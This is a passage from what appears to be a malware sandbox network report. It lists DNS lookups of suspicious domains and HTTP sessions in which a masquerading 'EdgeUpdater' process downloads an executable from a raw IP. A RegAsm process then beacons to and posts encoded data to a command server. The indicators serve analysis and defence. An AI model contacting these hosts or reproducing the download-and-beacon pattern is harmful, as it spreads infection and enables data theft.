Oct 2, 2024 09:41:31.768543005 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.768601894 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.768611908 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.768681049 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.768888950 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.768920898 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.768954039 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.768986940 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.769021034 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.769047976 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.772064924 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.772097111 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.772130013 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.772131920 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.772151947 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.772175074 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.772192001 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.772238970 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.772242069 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.772274017 CEST	80	49758	147.45.44.104	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 09:40:59.478262901 CEST	192.168.2.4	1.1.1.1	0xb677	Standard query (0)	yalubluseks.eu	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:00.712773085 CEST	192.168.2.4	1.1.1.1	0x7c94	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:08.622422934 CEST	192.168.2.4	1.1.1.1	0xa1c3	Standard query (0)	api64.ipify.org	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:09.498671055 CEST	192.168.2.4	1.1.1.1	0x11e2	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:18.168323040 CEST	192.168.2.4	1.1.1.1	0x1f2b	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:32.476869106 CEST	192.168.2.4	1.1.1.1	0xcea7	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:33.682024956 CEST	192.168.2.4	1.1.1.1	0xa3a9	Standard query (0)	chorusarorp.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:33.701240063 CEST	192.168.2.4	1.1.1.1	0xeee1	Standard query (0)	questionsmw.store	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:34.674828053 CEST	192.168.2.4	1.1.1.1	0x48b3	Standard query (0)	soldiefieop.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:35.772277117 CEST	192.168.2.4	1.1.1.1	0x36d0	Standard query (0)	abnomalrkmu.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:36.744153976 CEST	192.168.2.4	1.1.1.1	0xa852	Standard query (0)	treatynreit.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:37.667368889 CEST	192.168.2.4	1.1.1.1	0x8ea0	Standard query (0)	snarlypagowo.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:38.618701935 CEST	192.168.2.4	1.1.1.1	0xcfaf	Standard query (0)	mysterisop.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:39.616844893 CEST	192.168.2.4	1.1.1.1	0x4057	Standard query (0)	absorptioniw.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:40.737262011 CEST	192.168.2.4	1.1.1.1	0x6d83	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:41.972485065 CEST	192.168.2.4	1.1.1.1	0x64ae	Standard query (0)	gravvitywio.store	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:16.117464066 CEST	192.168.2.4	1.1.1.1	0x9383	Standard query (0)	chorusarorp.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:22.771004915 CEST	192.168.2.4	1.1.1.1	0xf226	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:24.428982973 CEST	192.168.2.4	1.1.1.1	0x48d4	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:37.289351940 CEST	192.168.2.4	1.1.1.1	0x36e9	Standard query (0)	chorusarorp.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:43.873878002 CEST	192.168.2.4	1.1.1.1	0xed49	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:46.487792015 CEST	192.168.2.4	1.1.1.1	0xa5b1	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:43:06.447493076 CEST	192.168.2.4	1.1.1.1	0xc570	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:43:08.491122961 CEST	192.168.2.4	1.1.1.1	0x28ae	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 09:40:59.502471924 CEST	1.1.1.1	192.168.2.4	0xb677	No error (0)	yalubluseks.eu		104.21.54.163	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:40:59.502471924 CEST	1.1.1.1	192.168.2.4	0xb677	No error (0)	yalubluseks.eu		172.67.140.92	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:00.719896078 CEST	1.1.1.1	192.168.2.4	0x7c94	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:00.719896078 CEST	1.1.1.1	192.168.2.4	0x7c94	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:00.719896078 CEST	1.1.1.1	192.168.2.4	0x7c94	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:08.630130053 CEST	1.1.1.1	192.168.2.4	0xa1c3	No error (0)	api64.ipify.org		104.237.62.213	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:08.630130053 CEST	1.1.1.1	192.168.2.4	0xa1c3	No error (0)	api64.ipify.org		173.231.16.77	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:09.505553961 CEST	1.1.1.1	192.168.2.4	0x11e2	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:18.175431013 CEST	1.1.1.1	192.168.2.4	0x1f2b	No error (0)	iplogger.org		104.26.2.46	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:18.175431013 CEST	1.1.1.1	192.168.2.4	0x1f2b	No error (0)	iplogger.org		172.67.74.161	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:18.175431013 CEST	1.1.1.1	192.168.2.4	0x1f2b	No error (0)	iplogger.org		104.26.3.46	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:32.484554052 CEST	1.1.1.1	192.168.2.4	0xcea7	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:33.697648048 CEST	1.1.1.1	192.168.2.4	0xa3a9	Name error (3)	chorusarorp.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:33.715075016 CEST	1.1.1.1	192.168.2.4	0xeee1	No error (0)	questionsmw.store		172.67.208.141	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:33.715075016 CEST	1.1.1.1	192.168.2.4	0xeee1	No error (0)	questionsmw.store		104.21.77.132	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:34.714123964 CEST	1.1.1.1	192.168.2.4	0x48b3	No error (0)	soldiefieop.site		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:34.714123964 CEST	1.1.1.1	192.168.2.4	0x48b3	No error (0)	soldiefieop.site		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:35.790693998 CEST	1.1.1.1	192.168.2.4	0x36d0	No error (0)	abnomalrkmu.site		104.21.56.150	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:35.790693998 CEST	1.1.1.1	192.168.2.4	0x36d0	No error (0)	abnomalrkmu.site		172.67.152.190	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:36.762537956 CEST	1.1.1.1	192.168.2.4	0xa852	No error (0)	treatynreit.site		104.21.84.18	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:36.762537956 CEST	1.1.1.1	192.168.2.4	0xa852	No error (0)	treatynreit.site		172.67.184.196	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:37.680166006 CEST	1.1.1.1	192.168.2.4	0x8ea0	No error (0)	snarlypagowo.site		104.21.18.193	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:37.680166006 CEST	1.1.1.1	192.168.2.4	0x8ea0	No error (0)	snarlypagowo.site		172.67.183.74	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:38.631871939 CEST	1.1.1.1	192.168.2.4	0xcfaf	No error (0)	mysterisop.site		172.67.195.67	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:38.631871939 CEST	1.1.1.1	192.168.2.4	0xcfaf	No error (0)	mysterisop.site		104.21.21.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:39.677079916 CEST	1.1.1.1	192.168.2.4	0x4057	No error (0)	absorptioniw.site		104.21.17.174	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:39.677079916 CEST	1.1.1.1	192.168.2.4	0x4057	No error (0)	absorptioniw.site		172.67.177.186	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:40.744215012 CEST	1.1.1.1	192.168.2.4	0x6d83	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:41.983867884 CEST	1.1.1.1	192.168.2.4	0x64ae	No error (0)	gravvitywio.store		104.21.16.12	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:41:41.983867884 CEST	1.1.1.1	192.168.2.4	0x64ae	No error (0)	gravvitywio.store		172.67.209.193	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:16.312628984 CEST	1.1.1.1	192.168.2.4	0x9383	Name error (3)	chorusarorp.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:22.780738115 CEST	1.1.1.1	192.168.2.4	0xf226	No error (0)	cowod.hopto.org		45.132.206.251	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:24.436564922 CEST	1.1.1.1	192.168.2.4	0x48d4	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:37.300121069 CEST	1.1.1.1	192.168.2.4	0x36e9	Name error (3)	chorusarorp.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:43.881616116 CEST	1.1.1.1	192.168.2.4	0xed49	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:43.881616116 CEST	1.1.1.1	192.168.2.4	0xed49	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:43.881616116 CEST	1.1.1.1	192.168.2.4	0xed49	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:42:46.508722067 CEST	1.1.1.1	192.168.2.4	0xa5b1	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:43:06.454838037 CEST	1.1.1.1	192.168.2.4	0xc570	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:43:08.498862028 CEST	1.1.1.1	192.168.2.4	0x28ae	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:43:08.498862028 CEST	1.1.1.1	192.168.2.4	0x28ae	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 2, 2024 09:43:08.498862028 CEST	1.1.1.1	192.168.2.4	0x28ae	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	172.67.74.152	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:41:00.747755051 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 2, 2024 09:41:01.200304985 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:01 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30c322b1978d5-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:41:02.201461077 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:41:02.312465906 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:02 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30c391d9278d5-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:41:36.665599108 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:41:36.772161961 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:36 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30d107eb678d5-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:41:37.704446077 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:41:37.811711073 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:37 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30d16fa7f78d5-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:42:09.672096968 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:42:09.777914047 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:09 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30ddece4a78d5-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:42:10.887821913 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:42:10.992939949 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:10 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30de668c378d5-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	147.45.44.104	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:41:03.358767033 CEST	92	OUT	GET /ldms/66fb252fe232b_Patksl.exe HTTP/1.1 Host: 147.45.44.104 Connection: Keep-Alive
Oct 2, 2024 09:41:03.992382050 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:03 GMT Content-Type: application/octet-stream Content-Length: 1964072 Last-Modified: Mon, 30 Sep 2024 22:24:47 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66fb252f-1df828" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 87 24 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 c8 1d 00 00 08 00 00 00 00 00 00 3e e6 1d 00 00 20 00 00 00 00 1e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 1e 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec e5 1d 00 4f 00 00 00 00 00 1e 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 d2 1d 00 28 26 00 00 00 20 1e 00 0c 00 00 00 b4 e4 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$f> @ @`O(& H.textD `.rsrc@@.reloc @B H wK!"h&NJ$mUOjSuYF{AYv5:#I5,J7+.:xJ&m)/uTj=bU/E7?_G\zd{$C=\|Ne,M4_?^9e@Fd8:-ZNJ4HD]0+[hkZKhR<2DC+=~iNY+py,5b%0^i,Nz@hmsdwB
Oct 2, 2024 09:41:03.992440939 CEST	1236	IN	Data Raw: 34 60 bb a8 35 91 ec 5b 6f ec b0 6c 11 44 72 7d 40 5c ca 42 de d6 d9 5c 96 01 18 61 01 fa 92 f1 57 9c 62 80 79 60 53 30 0d dd 30 52 76 90 bd 1e 1e f7 6c 98 06 14 2d 8f f4 28 8b 31 6d 37 77 31 fe 01 13 b8 87 89 2e c0 35 c0 b4 8c 3c 2c 78 5a 78 7b Data Ascii: 4`5[olDr}@\B\aWby`S00Rvl-(1m7w1.5<,xZx{:~Y@&"ecN_I{CLW1efP4w%!2c=(<5P @&(gTjxm_9h<7jM9_3Pm,4m
Oct 2, 2024 09:41:03.992477894 CEST	1236	IN	Data Raw: 27 dd d5 13 b1 ca 7f fd 01 ea 6e e5 cf 42 05 9b cb 43 cf a1 fb 7d b3 89 90 40 0a c8 f7 72 71 9f be e9 35 fe 99 bb fa e8 d0 5a 39 fc 9b 29 b1 38 ce 40 f8 29 98 9b 79 72 5f 1b 6e 58 e5 de f3 fa 83 8b b2 85 21 23 2c 8d c8 1b 0e 34 e1 6d b3 07 51 f2 Data Ascii: 'nBC}@rq5Z9)8@)yr_nX!#,4mQ0}'@XIWdCFs7ZaM)kiZ~T#tb=sOs"#>/1ukKFQ'"@*IfmEOswens__UGn0_uz
Oct 2, 2024 09:41:03.992512941 CEST	672	IN	Data Raw: 41 eb 9b 92 ec 5a 7c 3f 89 5d ea 70 01 66 62 3b f2 18 43 59 76 a5 bf 8c bb a1 da 40 76 1f dc 5e b9 95 b8 fe 10 dd d7 b6 5d 6f b2 29 aa 9b 46 0d 97 7a e5 ee d0 1c 88 b4 a1 8e c8 ce a1 e9 1e 8b 5d c3 2a 34 ad ad 77 7c 34 ad b1 5b b5 77 82 85 d1 db Data Ascii: AZ\|?]pfb;CYv@v^]o)Fz]*4w\|4[w%]M,5%V@k\|2U.,#$A:)0:4G$AsMq-N:{y.,T%6Yv+2u1&eT:uf8"{vL
Oct 2, 2024 09:41:03.992552042 CEST	1236	IN	Data Raw: 2e e7 35 e3 56 3b 05 0d 4f 48 15 98 7e 27 33 96 2c c7 35 99 01 d6 ba 97 99 85 a6 c5 a5 88 e0 b4 d3 18 5f 9a ed 9e bd a7 f5 07 59 9b ee dd ee 75 cb ad f7 83 19 34 66 53 0e cd ac 13 4e 5d 77 8c e9 cc 9f 4e 6d c1 ef b5 63 8b ba 63 9f 1f 26 b1 2b 46 Data Ascii: .5V;OH~'3,5_Yu4fSN]wNmcc&+F}~lc,3jW:Wt,<U-Q=4Gdv6Q5aG$6&,>%\h1EaHhRNLn)UzkwFjaw{A\|T7px{
Oct 2, 2024 09:41:03.992588043 CEST	1236	IN	Data Raw: c7 ce fa c4 5e 0f aa b9 28 28 ea b0 0a ea 51 d6 43 0e 57 07 df 3f b0 04 b8 10 3e 9e cd fe 94 72 40 0f d8 3c 14 e5 d3 41 84 13 20 2b f1 8f 14 08 cf 79 5d c1 29 fe 9b c3 9e 4c ea 21 ab 2e cf 93 ce 38 54 82 01 92 b9 f3 3b d0 a2 43 57 6f 26 19 1e e9 Data Ascii: ^((QCW?>r@<A +y])L!.8T;CWo&`}hVB;>@*#$ m\d-YG ]6:o)!PkVe7Qvt4G.A3K?uqCx[ P2o)ya::j$
Oct 2, 2024 09:41:03.992623091 CEST	1236	IN	Data Raw: 48 9f c9 ab 12 39 25 40 45 e3 07 dc 4d c0 86 ac 7d 93 5f d8 4c 01 5c fd 0c 2d 86 0b 50 d8 63 49 22 e7 ee 4c f3 4e 15 c6 e2 7e 56 ce e2 fb 35 6e 52 24 b6 43 1f 43 e2 e3 f7 32 37 c5 27 29 40 1a 14 60 35 68 90 d0 79 f8 c9 73 dc 3e 29 49 85 65 df 39 Data Ascii: H9%@EM}_L\-PcI"LN~V5nR$CC27')@`5hys>)Ie9x7DuWVPz<UgT+B*\M,eCx41sv/4#Uod#N,)E4TZXtD?}p1+XXuCj':aj:q68%]N
Oct 2, 2024 09:41:03.992655993 CEST	1236	IN	Data Raw: 80 30 42 b6 f1 f7 bf d9 68 2d 21 04 ec aa f3 d6 22 05 6f 9d 30 27 96 4f ff 4e 0b 78 ea e2 07 e5 5f 8e de e9 a7 3e e5 24 bd 56 53 e5 8d 94 3c e3 5b dd 8f 9f 34 8e 0c 35 65 70 dd 53 29 11 0d db 91 18 b9 f6 c1 ed 43 5d 41 d2 78 36 0c 86 9d 91 b3 0e Data Ascii: 0Bh-!"o0'ONx_>$VS<[45epS)C]Ax6;TomKB,6Al.~H}]P:f\|>P1!.m2q)?[%Xgo-~\|i7rm_m1[J5e?mR[4EKkn$b]eZQqn\
Oct 2, 2024 09:41:03.992696047 CEST	1236	IN	Data Raw: b5 27 b4 5d 2d 12 fc ae 9f 91 4d 0b 6f 1a 58 d4 53 e7 b5 b0 f2 78 ce c7 c1 af a9 e5 a6 8a 08 ff 97 2a 79 95 b8 59 be 3e b3 4f 6a cb 89 7f de 46 63 0f 71 44 a9 5a eb 24 53 a5 51 dd b8 e1 4a 67 3e 95 c5 cd 8b 55 e1 0d 51 b4 9c 72 2a 99 71 df 79 12 Data Ascii: ']-MoXSxyY>OjFcqDZ$SQJg>UQrqyXo]ki?>W$]"@7Y?w$^4bm!MHLC ;fS{eta%GP(RrX#.F#$yN> -]GjW7[CQHamZJ(\P{$5QlZc(
Oct 2, 2024 09:41:03.992733955 CEST	552	IN	Data Raw: 50 d8 c8 1a 1c da b1 0f 9f ca 7d 75 10 66 01 53 f3 76 6d 31 d2 ff d5 eb de 1a 01 df 7d 7f 30 d7 5c 01 79 d2 0d 52 2c 0e 7f e7 a2 1d 53 de 42 d3 9d 1c f3 f3 ea 22 14 ef 43 4a 8e 98 34 c2 3d 8e 5e a8 ee 2c f0 b9 89 27 cf 38 44 db 7a db 72 6a 92 be Data Ascii: P}ufSvm1}0\yR,SB"CJ4=^,'8DzrjG.c+K40,):^nNqT"lL.?3y,sW-!3F5c0a}{:4.H'Rx\|vuRCvBj+0wa$>$T1s
Oct 2, 2024 09:41:03.998055935 CEST	1236	IN	Data Raw: 48 6d f0 ac f4 82 8b d0 e0 0b fc e5 7c 7a 7a 84 5f 89 5a ac 29 96 f3 b5 a0 5d 0b fc 30 a1 74 38 84 85 a9 37 cb 75 94 f2 58 c7 af a0 9b 96 45 8b 64 3d 10 58 5f 76 2e 62 8f 43 a5 bd aa 20 fc 99 da cf 2b 00 d4 3d aa 33 ff 04 5a 0f a0 91 13 98 86 b2 Data Ascii: Hm\|zz_Z)]0t87uXEd=X_v.bC +=3Z._(Q (Wiq*=88\|@'aD2sG~vM3(x(Ay&wysOG2zz$y_z0+($O:C9zB&rszu,E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	41.216.188.190	80	7856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:41:07.846765041 CEST	204	OUT	GET /api/wp-ping.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 41.216.188.190
Oct 2, 2024 09:41:08.576824903 CEST	259	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 66 69 73 68 31 35 Data Ascii: fish15
Oct 2, 2024 09:41:12.029031038 CEST	276	OUT	POST /api/wp-admin.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 133 Host: 41.216.188.190
Oct 2, 2024 09:41:12.029031038 CEST	133	OUT	Data Raw: 64 61 74 61 3d 68 56 47 5a 33 55 45 64 70 42 30 71 54 36 47 7a 57 79 38 33 6d 39 54 4e 78 63 4f 57 43 57 42 5a 36 73 72 52 49 4e 6c 73 59 39 59 49 70 63 70 6f 50 38 35 4c 38 50 4d 56 6f 39 39 32 6c 43 48 53 6d 52 79 43 4d 5a 77 6f 59 32 70 6e 76 Data Ascii: data=hVGZ3UEdpB0qT6GzWy83m9TNxcOWCWBZ6srRINlsY9YIpcpoP85L8PMVo992lCHSmRyCMZwoY2pnvH799oJs-vofLoEKEoVNaI4eFlwSlKY-X6hf0lYh9leZKv6A-yQN
Oct 2, 2024 09:41:13.458782911 CEST	362	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 70 46 73 44 74 47 75 58 52 68 66 48 4f 6b 56 50 44 59 64 55 71 2f 31 43 57 6c 4a 61 75 2b 6f 4b 69 67 5a 30 39 74 44 4d 74 72 6e 71 36 4a 46 61 76 5a 2f 6f 6a 76 56 31 37 39 2b 77 39 6c 35 35 46 55 47 67 37 7a 58 50 67 5a 79 30 41 33 6b 44 69 39 72 66 71 4c 49 55 6a 70 34 4f 36 47 4a 4c 42 52 72 42 61 78 30 67 77 6c 30 3d Data Ascii: pFsDtGuXRhfHOkVPDYdUq/1CWlJau+oKigZ09tDMtrnq6JFavZ/ojvV179+w9l55FUGg7zXPgZy0A3kDi9rfqLIUjp4O6GJLBRrBax0gwl0=
Oct 2, 2024 09:41:13.458914042 CEST	362	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 70 46 73 44 74 47 75 58 52 68 66 48 4f 6b 56 50 44 59 64 55 71 2f 31 43 57 6c 4a 61 75 2b 6f 4b 69 67 5a 30 39 74 44 4d 74 72 6e 71 36 4a 46 61 76 5a 2f 6f 6a 76 56 31 37 39 2b 77 39 6c 35 35 46 55 47 67 37 7a 58 50 67 5a 79 30 41 33 6b 44 69 39 72 66 71 4c 49 55 6a 70 34 4f 36 47 4a 4c 42 52 72 42 61 78 30 67 77 6c 30 3d Data Ascii: 